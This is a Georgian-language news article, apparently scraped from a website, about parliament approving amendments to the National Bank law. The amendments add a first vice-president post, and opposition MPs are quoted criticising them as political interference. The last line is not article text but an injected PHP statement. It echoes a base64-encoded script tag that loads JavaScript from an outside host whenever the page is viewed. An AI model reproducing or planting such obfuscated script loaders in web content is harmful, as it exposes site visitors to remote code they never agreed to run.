celsiusi
ავერსი საქკაბელი
პარლამენტმა „ეროვნული ბანკის შესახებ“ კანონში შესატანი ცვლილებები დაამტკიცა. სებ-ის პრეზიდენტს, 1 პირველი ვიცე-პრეზიდენტი და 2 ვიცე-პრეზიდენტი ეყოლება.
პირველი ვიცე-პრეზიდენტის თანამდებობა ახალია და საკანონმდებლო ცვლილებების დამტკიცებამდე არ არსებობდა. პრეზიდენტის არყოფნის შემთხვევაში, მის მოვალეობას სწორედ პირველი ვიცე-პრეზიდენტი შეასრულებს. 
კიდევ ერთი ცვლილება ვიცე-პრეზიდენტების წარდგენის საკითხს ეხება. თუ სებ-ის პრეზიდენტი პირველი ვიცე-პრეზიდენტის კანდიდატურას ვერ წარადგენს, საბჭოს არანაკლებ ორ წევრს შეუძლია მისი წარდგენა, რომელსაც საბჭო დაამტკიცებს.
კანონში დაგეგმილ ცვლილებებს ეწინააღმდეგება ოპოზიციონერი დეპუტატების ნაწილი. პარტია „გირჩის“ ერთ-ერთი ლიდერისა და პარლამენტის წევრის, ალექსანდრე რაქვიაშვილის განცხადებით, ეროვნული ბანკის პრეზიდენტის არჩევამდე ერთი თვით ადრე, „ეროვნული ბანკის შესახებ“ კანონში უმრავლესობის მიერ შემუშავებული ცვლილებები, თანამდებობების გადანაწილების მცდელობას უკავშირდება.
როგორც მან პლენარული სესიის სხდომაზე განაცხადა, დაგეგმილი ცვლილებების შედეგად, სავარაუდოდ, ნათია თურნავას აირჩევენ პირველი ვიცე-პრეზიდენტის პოზიციაზე, რომელსაც სებ-ის პრეზიდენტის მოვალეობის შესრულება დაეკისრება.
პლენარულ სხდომაზე სიტყვით გამოსვლისას ხელისუფლების მხრიდან მარეგულირებლის საკადრო საქმიანობაში ჩარევის მცდელობაზე გაამახვილა ყურადღება „ლელო საქართველოსთვის“ პოლიტიკური საბჭოს ხელმძღვანელმა, დავით უსუფაშვილმა. მისი თქმით, ცვლილებების მიზანია, ხელისუფლება უხეშად ჩაერიოს დამოუკიდებელი ინსტიტუტის შიდა ცხოვრებაში - საკადრო საქმიანობაში.   
კანონპროექტი დაჩქარებული წესით განიხილეს. მისი ავტორები და ინიციატორები საპარლამენტო უმრავლესობის წევრები არიან.
აღსანიშნავია, რომ ეროვნული ბანკი მოქმედ პრეზიდენტს, კობა გვენეტაძეს პრეზიდენტობის ვადა 2 მარტს ეწურება და ჯერჯერობით უცნობია, ვინ იქნება მისი შემცვლელი.
354
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");